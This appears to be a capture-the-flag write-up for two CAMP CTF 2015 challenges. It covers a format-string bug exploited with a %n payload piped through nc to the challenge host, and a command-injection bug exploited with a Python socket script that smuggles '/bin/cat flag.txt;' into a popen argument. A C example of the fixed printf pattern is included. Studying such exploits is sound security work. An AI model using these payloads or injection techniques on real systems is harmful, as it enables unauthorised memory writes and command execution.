hacker_level 200 CAMPCTF – 2015

This is another exploitation problem that I solved with the help of a friend. It was a very simple FORMAT STRING vulnerability challenge, and since the source code was given it became even easier to solve.
The vulnerability in this challenge lies in

        usleep(150000);
        printf("Hello, ");
        printf(name);

the printf(name) call right after printf("Hello, ").
So the main goal of this challenge is to change the value of level to 0xCCC31337 using the format string. The main difficulty is that the variable level is not on the stack; it lives in the .bss section. Seeing all this, I remembered solving the same kind of challenge in 'Exploit-exercises', namely Format:level3. By solving that challenge again I solved this one.
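The vulnerable pattern quoted above beside its fixed form, as an added C example that is not the challenge's source: `level` stands in for the .bss variable the write-up mentions, and the function names are mine. Passing the input as a `%s` argument means a `%n` directive is copied as text instead of being executed as a write, so `level` is never touched.

```c
#include <stdio.h>
#include <string.h>

/* Stand-in for the challenge's target variable: a global with no initialiser
 * is placed in .bss, not on the stack, just as the write-up describes. */
static unsigned int level = 0;

/* The pattern from the challenge source: user input IS the format string.
 * Every '%' directive in `name` is interpreted, and '%n' turns the call
 * into a write. gcc -Wformat-security warns on this line; with
 * -D_FORTIFY_SOURCE=2 (and -O1 or higher) glibc also aborts at run time
 * when a format string in writable memory contains '%n'. */
void greet_vulnerable(const char *name)
{
    printf("Hello, ");
    printf(name);
}

/* Fixed form: the format string is a literal and the input is an argument,
 * so '%' characters are copied as ordinary data. Writes into `out` so the
 * result can be checked; returns the length, or -1 if `out` was too small. */
int greet_fixed(const char *name, char *out, size_t outsz)
{
    int n = snprintf(out, outsz, "Hello, %s", name);
    return (n >= 0 && (size_t)n < outsz) ? n : -1;
}

unsigned int current_level(void)
{
    return level;
}

int main(void)
{
    char buf[64];
    /* Constructed probe: one directive taken from the payload in this write-up. */
    const char *probe = "%294u%7$n";

    if (greet_fixed(probe, buf, sizeof buf) > 0)
        puts(buf);                        /* Hello, %294u%7$n  (printed literally) */
    printf("level = 0x%x\n", current_level());   /* level = 0x0 */
    return 0;
}
```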

Finally here is the exploit:

python -c 'print "\x4c\xa0\x04\x08"+ "\x4d\xa0\x04\x08"+ "\x4e\xa0\x04\x08" + "\x4f\xa0\x04\x08 "  + "%294u%7$n" + "%220u%8$n" + "%176u%9$n"+ "%265u%10$n"' | nc 144.76.92.167 10118

And the flag of this challenge is: CAMP15_337deec05ccc63b1168ba3379ae4d65854132604

secret_file (150) CAMP CTF – 2015

This challenge is from CAMP CTF 2015. This is the first time I solved a real binary exploitation challenge. The given binary is an ELF 64-bit, dynamically linked and stripped. I randomly gave a large input and got a segmentation fault at some point, so I thought it must be some simple ROP and started reversing it. I found some vulnerable functions like getline (which doesn't check the size of the input), and there was also a strcpy call; I was shocked: "why the need for strcpy when you have getline?". To check whether NX was enabled or not, I used checksec.

RELRO           STACK CANARY      NX            PIE               RPATH         RUNPATH
Full RELRO    Canary found    NX enabled    PIE enabled     No RPATH   No RUNPATH

I was shocked seeing Full RELRO and a canary, with which you cannot use normal ROP. So I thought there must be something other than the overflow and started reversing it again. I found a popen call which could spawn a shell. But to reach that call you have to pass a strcmp check, and the comparison was against some hash value.

Later I figured out it was a SHA-256 hash, and it was hashing 256 bytes. But I didn't know which 256 bytes those were. After some brute forcing I found they were the first 256 bytes of the input, and the comparison was against the input from the 284th byte onward. I tried giving input matching that and it worked: I could call popen with the argument starting from the 257th byte of the input. Then I tried giving "/bin/sh\x00" as the argument, but that didn't work because there is a strrchr call at the beginning which I hadn't noticed. That function was searching for a null byte. So that didn't work and I wasted a lot of time trying other stuff. Later one of my seniors gave me an idea: command injection with ';'. I tried reading the flag with it and that worked... 🙂

And here is my exploit.

import socket

ip = "144.76.92.167"
port = 10105

soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
soc.connect((ip, port))

# Layout as described above: the binary hashes the first 256 bytes of the
# input and compares the hex digest with what starts at the 284th byte.
payload = ''
payload += "A" * 256                # the 256 bytes that get hashed
payload += "/bin/cat flag.txt;"     # popen argument starts at byte 257; ';' ends the command
payload += "B" * 9                  # padding up to byte 283
payload += "e075f2f51cad23d0537186cfcd50f911ea954f9c2e32a437f45327f1b7899bbb"  # SHA-256 of 256 A's, from byte 284

soc.send(payload + '\n')
print soc.recv(1050)